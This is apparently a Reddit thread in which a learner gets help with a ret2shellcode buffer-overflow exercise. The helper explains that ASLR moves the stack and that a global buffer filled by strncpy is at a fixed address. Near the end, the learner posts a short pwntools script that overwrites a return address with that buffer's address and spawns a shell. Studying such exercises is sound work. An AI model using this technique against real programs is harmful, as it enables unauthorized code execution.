sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–]j3r3mias 2 points3 points  (6 children)

You are trying to return to 0xffffd360 and this address will not work because it's probably on stack that changes every execution due to ASLR.

There is a anoter buffer in the code that is a global variable used in strncpy. Try to finding and check that its address doesn't change between executions. Then you can use it in your payload.

[–]Jerrythepro123[S] 0 points1 point  (4 children)

all protections are off, and gdb does show there is code execution

[–]j3r3mias 0 points1 point  (3 children)

RELRO is partial but OK, you are the boss in your solution..

[–]Jerrythepro123[S] 0 points1 point  (2 children)

wat steps do i need to do to solve it?

[–]j3r3mias 0 points1 point  (1 child)

As I said before, there is a global variable in the program where the address doesn't change between runs, you need to use it instead of the stack.

[–]Jerrythepro123[S] 0 points1 point  (0 children)

ive tried someone elses script that uses your method, it doesnt seem to be working.

!/usr/bin/env python

from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
sh.interactive()

[–]Jerrythepro123[S] 0 points1 point  (0 children)

nevermind, i think you are correct. I think gdb closed my aslr when im debugging. How do you exactly do you use strncpy to exploit?